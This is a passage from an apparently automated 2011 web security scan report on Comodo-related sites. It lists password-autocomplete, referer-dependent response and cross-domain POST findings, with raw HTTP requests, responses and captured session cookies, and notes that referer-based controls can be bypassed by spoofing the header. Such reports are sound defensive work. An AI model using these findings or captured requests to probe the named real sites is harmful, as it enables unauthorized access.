Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=c448a660b087763e95615484a201
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:24:31 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 9488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
</tr>
<form action = "/PCICS/PanController/doRegisterUser?partner=Comodo" method = "post" id="userRegistrationForm">
<tr>
...[SNIP]...
<td><input type="password" name="passwordValue" value="" size="32" maxlength="32" tabindex="10"/></td>
...[SNIP]...
<td><input type="password" name="passwordValueConfirm" value="" size="32" maxlength="32" tabindex="11"/></td>
...[SNIP]...

7.45. http://www.trustfax.com/login.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.trustfax.com
Path:	/login.html

Issue detail

The page contains a form with the following action URL:

https://secure.trustfax.com/UnifiedLogin.serv

The form contains the following password field with autocomplete enabled:

password

Request

GET /login.html HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:36 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:36 GMT
Content-Length: 9335
X-TWA-Web: pa:28192
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</h1> <form id="loginForm" class="form" method="post" action="https://secure.trustfax.com/UnifiedLogin.serv" name="loginForm"> <table border="0" cellspacing="2" cellpadding="1">
...[SNIP]...
<td><input type="password" name="password" /></td>
...[SNIP]...

7.46. http://www.trustix.com/login.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.trustix.com
Path:	/login.html

Issue detail

The page contains a form with the following action URL:

https://secure.comodo.net/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

loginPassword

Request

GET /login.html HTTP/1.1
Host: www.trustix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:26 GMT
Content-Type: text/html
Content-Length: 3852
Last-Modified: Fri, 15 Dec 2006 15:12:29 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Trust
...[SNIP]...
</p>

<form name="loginForm" method="post" action="https://secure.comodo.net/products/!hostedLogin" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
<table cellspacing="0" cellpadding="0" >
...[SNIP]...
<td><input type="password" size="20" maxlength="128" onfocus="this.select()" name="loginPassword" /></td>
...[SNIP]...

7.47. http://www.trustix.com/support/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.trustix.com
Path:	/support/index.html

Issue detail

The page contains a form with the following action URL:

https://secure.comodo.net/products/!placeOrder

The form contains the following password field with autocomplete enabled:

loginPassword

Request

GET /support/index.html HTTP/1.1
Host: www.trustix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:26 GMT
Content-Type: text/html
Content-Length: 11955
Last-Modified: Fri, 15 Dec 2006 15:12:29 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Trustix&
...[SNIP]...
</table>

<form name="form1" method="post" action="https://secure.comodo.net/products/!placeOrder" onsubmit="return checkForm(this);">
<input type="hidden" name="ap" value="trustix" />
...[SNIP]...
<td><input type="password" name="loginPassword" value="" /></td>
...[SNIP]...

7.48. http://www.vengine.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.49. http://www.vengine.com/corporate/about.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/corporate/about.html

Issue detail

The page contains a form with the following action URL:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

password

Request

Response

7.50. http://www.vengine.com/corporate/contact.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/corporate/contact.html

Issue detail

The page contains a form with the following action URL:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

password

Request

Response

7.51. http://www.vengine.com/products/best_practices.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/best_practices.html

Issue detail

The page contains a form with the following action URL:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

password

Request

GET /products/best_practices.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.52. http://www.vengine.com/products/features.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/features.html

Issue detail

The page contains a form with the following action URL:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

password

Request

GET /products/features.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.53. http://www.vengine.com/products/free_tools.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/free_tools.html

Issue detail

The page contains a form with the following action URL:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

password

Request

Response

7.54. http://www.vengine.com/products/overview.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/overview.html

Issue detail

The page contains a form with the following action URL:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

password

Request

GET /products/overview.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.55. http://www.vengine.com/products/prove_it.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/prove_it.html

Issue detail

The page contains a form with the following action URL:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

password

Request

Response

7.56. http://www.vengine.com/products/tour.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/tour.html

Issue detail

The page contains a form with the following action URL:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

password

Request

GET /products/tour.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.57. http://www.vengine.com/products/vengine/eula.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/eula.html

Issue detail

The page contains a form with the following action URL:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

password

Request

GET /products/vengine/eula.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.58. http://www.vengine.com/products/vengine/faq.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/faq.html

Issue detail

The page contains a form with the following action URL:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

password

Request

GET /products/vengine/faq.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.59. http://www.vengine.com/products/vengine/first_time.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/first_time.html

Issue detail

The page contains a form with the following action URL:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

password

Request

GET /products/vengine/first_time.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.60. http://www.vengine.com/products/vengine/help.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/help.html

Issue detail

The page contains a form with the following action URL:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

password

Request

GET /products/vengine/help.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.61. http://www.vengine.com/products/vengine/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/index.html

Issue detail

The page contains a form with the following action URL:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

password

Request

GET /products/vengine/index.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.62. http://www.vengine.com/products/vengine/options.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/options.html

Issue detail

The page contains a form with the following action URL:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

password

Request

GET /products/vengine/options.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.63. http://www.vengine.com/products/vengine/requirements.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/requirements.html

Issue detail

The page contains a form with the following action URL:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

password

Request

GET /products/vengine/requirements.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.64. http://www.vengine.com/products/vengine/setup.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/setup.html

Issue detail

The page contains a form with the following action URL:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

password

Request

GET /products/vengine/setup.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.65. http://www.vengine.com/products/vengine/ssl_feedback.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/ssl_feedback.html

Issue detail

The page contains a form with the following action URL:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

password

Request

Response

7.66. http://www.vengine.com/products/vengine/uninstall.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/uninstall.html

Issue detail

The page contains a form with the following action URL:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

password

Request

GET /products/vengine/uninstall.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.67. http://www.vengine.com/sitemap.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/sitemap.html

Issue detail

The page contains a form with the following action URL:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

password

Request

GET /sitemap.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.68. http://www.vengine.com/support/faq.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/support/faq.html

Issue detail

The page contains a form with the following action URL:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

password

Request

GET /support/faq.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.69. http://www.vengine.com/support/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/support/index.html

Issue detail

The page contains a form with the following action URL:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

password

Request

Response

7.70. https://www.vengine.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.vengine.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://secure.comodo.com/products/!hostedLogin

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:38:40 GMT
Content-Type: text/html
Content-Length: 11760
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>Anti Phishing Site
...[SNIP]...
<div id="login" style="top: 46px;">

<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

8. Referer-dependent response previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://secure.instantssl.com
Path:	/products/passwordResetRequest

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

Request 1

POST /products/passwordResetRequest HTTP/1.1
Host: secure.instantssl.com
Connection: keep-alive
Referer: https://secure.instantssl.com/management/passwordResetRequest.html
Content-Length: 66
Cache-Control: max-age=0
Origin: https://secure.instantssl.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316328656750r0.6942118240986019; __utmx=261615573.; __utmxx=261615573.; optimizelyBuckets=%7B%229298079%22%3A9298080%7D; __utma=261615573.129590781.1316328660.1316328660.1316362417.2; __utmb=261615573; __utmc=261615573; __utmz=261615573.1316362417.2.2.utmccn=(referral)|utmcsr=comodo.com|utmcct=/e-commerce/ssl-certificates/free-ssl-cert.php|utmcmd=referral

orderNumber=4543252345324523453245&loginName=&emailAddress=4353245

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:13:20 GMT
Content-Type: text/html; charset=us-ascii
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 449
Cache-Control: max-age=-1

<html>
<head>
<title>Password Reset: ERROR!</title>
<link rel="stylesheet" href="/css/css.css">
</head>
<body>
<b>4543252345324523453245</b> is not a valid Order Number.
<br><br><input type="button" class="input" value="< Back" onClick="window.location = 'https://secure.instantssl.com/management/passwordResetRequest.html'">
  <input type="button" class="input" value="Close Window" onClick="window.close()">
</body>
</html>

Request 2

POST /products/passwordResetRequest HTTP/1.1
Host: secure.instantssl.com
Connection: keep-alive
Content-Length: 66
Cache-Control: max-age=0
Origin: https://secure.instantssl.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316328656750r0.6942118240986019; __utmx=261615573.; __utmxx=261615573.; optimizelyBuckets=%7B%229298079%22%3A9298080%7D; __utma=261615573.129590781.1316328660.1316328660.1316362417.2; __utmb=261615573; __utmc=261615573; __utmz=261615573.1316362417.2.2.utmccn=(referral)|utmcsr=comodo.com|utmcct=/e-commerce/ssl-certificates/free-ssl-cert.php|utmcmd=referral

orderNumber=4543252345324523453245&loginName=&emailAddress=4353245

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:13:51 GMT
Content-Type: text/html; charset=us-ascii
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 383
Cache-Control: max-age=-1

<html>
<head>
<title>Password Reset: ERROR!</title>
<link rel="stylesheet" href="/css/css.css">
</head>
<body>
<b>4543252345324523453245</b> is not a valid Order Number.
<br><br><input type="button" class="input" value="< Back" onClick="window.location = ''">
  <input type="button" class="input" value="Close Window" onClick="window.close()">
</body>
</html>

9. Cross-domain POST previous next
There are 44 instances of this issue:

http://efaxcorporate.com/
http://efaxdeveloper.com/developer/signup
http://hackerguardian.com/pci-compliance/addsupport/ssl-purchase.html
https://hackerguardian.com/pci-compliance/addsupport/ssl-purchase.html
http://www.comodoantispam.com/signup.html
http://www.comodopartners.com/partner/evssl.html
http://www.comodopartners.com/partner/partnerdoc.html
http://www.comodopartners.com/partner/rootkey.html
http://www.comodopartners.com/partner/trustlogo.html
http://www.contentverification.com/
http://www.contentverification.com/certs/BoilingSpringsLoginBox.cer
http://www.contentverification.com/logos/login.html
http://www.contentverification.com/logos/login.html
http://www.contentverification.com/logos/logo.html
http://www.contentverification.com/logos/thirdparty.html
http://www.enterprisessl.com/ssl-certificate-products/addsupport/ssl-purchase.html
https://www.enterprisessl.com/login.html
http://www.keepitsafe.com/corporate_enterprise.php
http://www.keepitsafe.com/solutions.php
http://www.trustix.com/login.html
http://www.trustix.com/support/index.html
http://www.vengine.com/
http://www.vengine.com/corporate/about.html
http://www.vengine.com/corporate/contact.html
http://www.vengine.com/products/best_practices.html
http://www.vengine.com/products/features.html
http://www.vengine.com/products/free_tools.html
http://www.vengine.com/products/overview.html
http://www.vengine.com/products/prove_it.html
http://www.vengine.com/products/tour.html
http://www.vengine.com/products/vengine/eula.html
http://www.vengine.com/products/vengine/faq.html
http://www.vengine.com/products/vengine/first_time.html
http://www.vengine.com/products/vengine/help.html
http://www.vengine.com/products/vengine/index.html
http://www.vengine.com/products/vengine/options.html
http://www.vengine.com/products/vengine/requirements.html
http://www.vengine.com/products/vengine/setup.html
http://www.vengine.com/products/vengine/ssl_feedback.html
http://www.vengine.com/products/vengine/uninstall.html
http://www.vengine.com/sitemap.html
http://www.vengine.com/support/faq.html
http://www.vengine.com/support/index.html
https://www.vengine.com/

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

9.1. http://efaxcorporate.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://efaxcorporate.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

formName
00N300000014oU4
00N30000001009H
retURL
lead_source
00N60000001QHzW
oid
OFFERCODE
company
phone
first_name
00N60000001Sf0Y
00N60000001Sf0Y
00N60000001Sf0Y
00N60000001Sf0Y
00N60000001Sf0Y
00N60000001Sf0Y
00N60000001Sf0Y
00N60000001Sf0Y
last_name
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
email
00N300000017W4s
00N300000017W4s
00N300000017W4s
00N300000017W4s
00N300000017W4s
00N300000017W4s
Submit

Request

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:20 GMT
Server: Apache
Vary: Host,Accept-Encoding
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=37657A97FCC62C80A944C9835E8E0575.efaxcorp1b; Path=/efaxcorp-cms-public
Set-Cookie: brand=efaxcorp; Domain=.efaxcorporate.com; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:19:20 GMT
Content-Length: 56030
X-TWA-Web: pa:28012
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div style="width: 700px; margin-top: 90px;">
<form style="width: 700px;" method="POST" id="corporateInquiryForm" name="corporateInquiryForm" action="https://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8">
<input type="hidden" value="corporateInquiryForm" name="formName"/>
...[SNIP]...

9.2. http://efaxdeveloper.com/developer/signup previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://efaxdeveloper.com
Path:	/developer/signup

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

formName
first_name
last_name
company
phone
email
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
OON300000017W4s
OON300000017W4s
OON300000017W4s
OON300000017W4s
OON300000017W4s
OON300000017W4s
DevelopmentPlatformSelection
DevelopmentPlatformSelection
DevelopmentPlatformSelection
DevelopmentPlatformSelection
DevelopmentPlatformSelection
DevelopmentPlatformSelection
00N300000014oU4
00N30000001009H
00N30000001009C
retURL
lead_source
oid

Request

GET /developer/signup HTTP/1.1
Host: efaxdeveloper.com
Proxy-Connection: keep-alive
Referer: http://efaxdeveloper.com/?utm_source=j2&utm_medium=cross+sell&utm_campaign=enterprise+page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMS_JSESSIONID=GfhfT1hLPGT9699d9vcWJ3xgrF8M1QQ244SXv36VfyS6KssGwVWX!-244489612; lang=en; AKAINFO=client=eozbczabczaof//areacode=408//city=SANJOSE//state=CA//country=US//region=NA//bandwidth=vhigh//timezone=PST//version=3; mbox=check#true#1316366491|session#1316366430838-226146#1316368291|PC#1316366430838-226146.19#1318180833; __utma=1.1246933238.1316366432.1316366432.1316366432.1; __utmb=1.1.10.1316366432; __utmc=1; __utmz=1.1316366432.1.1.utmcsr=j2|utmccn=enterprise%20page|utmcmd=cross%20sell; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:48 GMT
Server: Apache
Cache-Control: max-age=43200, public
Pragma:
Content-Length: 51538
Expires: Mon, 19 Sep 2011 00:19:48 GMT
Last-Modified: Mon, 12 Sep 2011 10:27:24 GMT
X-Magnolia-Registration: Registered
Set-Cookie: lang=en; domain=efaxdeveloper.com; expires=Wednesday, 02-Nov-2011 12:19:48 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-TWA-Web: pb:28032
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<div s
...[SNIP]...
<div class="mboxDefault" style="visibility: visible; display: block;width:338px;margin-left:auto;margin-right:auto;" >

<form action="http://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8" name="signup" id="signup" method="POST" onsubmit="return signupValidate();" style="width:100%" >
<div id ="signupformErrorMessage" class="formErrorMessage" style="display:none;">
...[SNIP]...

9.3. http://hackerguardian.com/pci-compliance/addsupport/ssl-purchase.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hackerguardian.com
Path:	/pci-compliance/addsupport/ssl-purchase.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

_3_PPP
_3_location
_4_PPP
_4_location
isReturningCustomer
isReturningCustomer
loginName
loginPassword
verifyPassword
organizationName
streetAddress1
localityName
stateOrProvinceName
postalCode
postOfficeBox
vatStatus
vatStatus
vatNumber
vatStatus
name
emailAddress
telephoneNumber
currency
region
referrerURL
entryURL
ap
successURL
iAgreeToTheTsAndCs
contractSignerName
contractSignerTitle
contractSignerTelephoneNumber
contractSignerEmailAddress
Submit

Request

Response

9.4. https://hackerguardian.com/pci-compliance/addsupport/ssl-purchase.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://hackerguardian.com
Path:	/pci-compliance/addsupport/ssl-purchase.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

_3_PPP
_3_location
_4_PPP
_4_location
isReturningCustomer
isReturningCustomer
loginName
loginPassword
verifyPassword
organizationName
streetAddress1
localityName
stateOrProvinceName
postalCode
postOfficeBox
vatStatus
vatStatus
vatNumber
vatStatus
name
emailAddress
telephoneNumber
currency
region
referrerURL
entryURL
ap
successURL
iAgreeToTheTsAndCs
contractSignerName
contractSignerTitle
contractSignerTelephoneNumber
contractSignerEmailAddress
Submit

Request

Response

9.5. http://www.comodoantispam.com/signup.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.comodoantispam.com
Path:	/signup.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

ap
currency
region
successURL
errorURL
cancelURL
name
organizationName
streetAddress1
streetAddress2
localityName
stateOrProvinceName
postalCode
telephoneNumber
emailAddress
1_PPP
email
submit

Request

GET /signup.html HTTP/1.1
Host: www.comodoantispam.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/products/prove_it.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:40:09 GMT
Content-Type: text/html
